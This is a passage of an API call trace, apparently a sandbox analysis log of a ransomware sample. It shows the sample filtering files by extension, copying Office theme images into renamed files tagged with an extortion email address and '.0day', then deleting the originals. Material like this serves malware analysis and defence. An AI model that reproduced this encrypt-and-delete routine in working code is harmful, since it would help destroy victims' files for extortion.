[0045.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.928] lstrlenW (lpString=".1cd") returned 4 [0045.928] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.928] lstrlenW (lpString=".jpg") returned 4 [0045.928] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.928] lstrlenW (lpString=".doc") returned 4 [0045.928] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.928] lstrlenW (lpString=".docx") returned 5 [0045.928] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.928] lstrlenW (lpString=".pdf") returned 4 [0045.928] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.928] lstrlenW (lpString=".xls") returned 4 [0045.928] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.928] lstrlenW (lpString=".xlsx") returned 5 [0045.928] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.928] lstrlenW (lpString=".ppt") returned 4 [0045.928] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.928] lstrlenW (lpString=".zip") returned 4 [0045.928] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.929] lstrlenW (lpString=".rar") returned 4 [0045.929] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.929] lstrlenW (lpString=".bz2") returned 4 [0045.929] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.929] lstrlenW (lpString=".7z") returned 3 [0045.929] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.929] lstrlenW (lpString=".dbf") returned 4 [0045.929] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.929] lstrlenW (lpString=".1cd") returned 4 [0045.929] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.929] lstrlenW (lpString=".jpg") returned 4 [0045.929] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.929] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.929] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.930] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=18817) returned 1 [0045.930] CloseHandle (hObject=0x190) returned 1 [0045.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 0x20 [0045.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.930] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.930] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.931] GetLastError () returned 0x0 [0045.931] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x4981, lpOverlapped=0x0) returned 1 [0045.934] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x4990, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4990, lpOverlapped=0x0) returned 1 [0045.936] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.936] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.936] SetEndOfFile (hFile=0x16c) returned 1 [0045.936] CloseHandle (hObject=0x16c) returned 1 [0045.936] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.936] SetEndOfFile (hFile=0x190) returned 1 [0045.937] CloseHandle (hObject=0x190) returned 1 [0045.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.937] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 1 [0045.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.937] lstrlenW (lpString=".doc") returned 4 [0045.937] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.937] lstrlenW (lpString=".docx") returned 5 [0045.937] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.937] lstrlenW (lpString=".pdf") returned 4 [0045.937] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.937] lstrlenW (lpString=".xls") returned 4 [0045.938] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.938] lstrlenW (lpString=".xlsx") returned 5 [0045.938] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.938] lstrlenW (lpString=".ppt") returned 4 [0045.938] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.938] lstrlenW (lpString=".zip") returned 4 [0045.938] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.938] lstrlenW (lpString=".rar") returned 4 [0045.938] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.938] lstrlenW (lpString=".bz2") returned 4 [0045.938] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.938] lstrlenW (lpString=".7z") returned 3 [0045.938] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.938] lstrlenW (lpString=".dbf") returned 4 [0045.938] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.938] lstrlenW (lpString=".1cd") returned 4 [0045.938] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.938] lstrlenW (lpString=".jpg") returned 4 [0045.938] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.938] lstrlenW (lpString=".doc") returned 4 [0045.938] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.938] lstrlenW (lpString=".docx") returned 5 [0045.938] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.938] lstrlenW (lpString=".pdf") returned 4 [0045.938] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.938] lstrlenW (lpString=".xls") returned 4 [0045.939] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.939] lstrlenW (lpString=".xlsx") returned 5 [0045.939] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.939] lstrlenW (lpString=".ppt") returned 4 [0045.939] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.939] lstrlenW (lpString=".zip") returned 4 [0045.939] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.939] lstrlenW (lpString=".rar") returned 4 [0045.939] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.939] lstrlenW (lpString=".bz2") returned 4 [0045.939] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.939] lstrlenW (lpString=".7z") returned 3 [0045.939] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.939] lstrlenW (lpString=".dbf") returned 4 [0045.939] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.939] lstrlenW (lpString=".1cd") returned 4 [0045.939] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.939] lstrlenW (lpString=".jpg") returned 4 [0045.939] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.939] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.939] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.939] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.940] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5179) returned 1 [0045.940] CloseHandle (hObject=0x190) returned 1 [0045.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 0x20 [0045.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.941] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.941] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.942] GetLastError () returned 0x0 [0045.942] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x143b, lpOverlapped=0x0) returned 1 [0046.124] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1440, lpOverlapped=0x0) returned 1 [0046.125] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.125] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.125] SetEndOfFile (hFile=0x16c) returned 1 [0046.125] CloseHandle (hObject=0x16c) returned 1 [0046.125] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.125] SetEndOfFile (hFile=0x190) returned 1 [0046.126] CloseHandle (hObject=0x190) returned 1 [0046.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.126] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 1 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.127] lstrlenW (lpString=".doc") returned 4 [0046.127] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.127] lstrlenW (lpString=".docx") returned 5 [0046.127] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.127] lstrlenW (lpString=".pdf") returned 4 [0046.127] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.127] lstrlenW (lpString=".xls") returned 4 [0046.127] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.127] lstrlenW (lpString=".xlsx") returned 5 [0046.127] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.127] lstrlenW (lpString=".ppt") returned 4 [0046.127] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.127] lstrlenW (lpString=".zip") returned 4 [0046.127] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.127] lstrlenW (lpString=".rar") returned 4 [0046.127] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.127] lstrlenW (lpString=".bz2") returned 4 [0046.127] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.127] lstrlenW (lpString=".7z") returned 3 [0046.127] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.127] lstrlenW (lpString=".dbf") returned 4 [0046.127] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.127] lstrlenW (lpString=".1cd") returned 4 [0046.127] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.127] lstrlenW (lpString=".jpg") returned 4 [0046.127] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.128] lstrlenW (lpString=".doc") returned 4 [0046.128] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.128] lstrlenW (lpString=".docx") returned 5 [0046.128] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.128] lstrlenW (lpString=".pdf") returned 4 [0046.128] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.128] lstrlenW (lpString=".xls") returned 4 [0046.128] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.128] lstrlenW (lpString=".xlsx") returned 5 [0046.128] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.128] lstrlenW (lpString=".ppt") returned 4 [0046.128] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.128] lstrlenW (lpString=".zip") returned 4 [0046.128] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.128] lstrlenW (lpString=".rar") returned 4 [0046.128] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.128] lstrlenW (lpString=".bz2") returned 4 [0046.128] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.128] lstrlenW (lpString=".7z") returned 3 [0046.128] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.128] lstrlenW (lpString=".dbf") returned 4 [0046.128] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.128] lstrlenW (lpString=".1cd") returned 4 [0046.128] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.128] lstrlenW (lpString=".jpg") returned 4 [0046.128] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.129] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.129] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.129] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1364) returned 1 [0046.129] CloseHandle (hObject=0x190) returned 1 [0046.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 0x20 [0046.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0046.129] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.129] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.130] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.444] GetLastError () returned 0x0 [0046.444] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x554, lpOverlapped=0x0) returned 1 [0046.445] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x560, lpOverlapped=0x0) returned 1 [0046.446] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.446] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.446] SetEndOfFile (hFile=0x194) returned 1 [0046.446] CloseHandle (hObject=0x194) returned 1 [0046.446] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.446] SetEndOfFile (hFile=0x190) returned 1 [0046.447] CloseHandle (hObject=0x190) returned 1 [0046.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.447] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 1 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".doc") returned 4 [0046.448] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.448] lstrlenW (lpString=".docx") returned 5 [0046.448] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.448] lstrlenW (lpString=".pdf") returned 4 [0046.448] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".xls") returned 4 [0046.448] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".xlsx") returned 5 [0046.448] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.448] lstrlenW (lpString=".ppt") returned 4 [0046.448] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".zip") returned 4 [0046.448] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".rar") returned 4 [0046.448] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".bz2") returned 4 [0046.448] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.448] lstrlenW (lpString=".7z") returned 3 [0046.448] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".dbf") returned 4 [0046.448] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".1cd") returned 4 [0046.448] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.448] lstrlenW 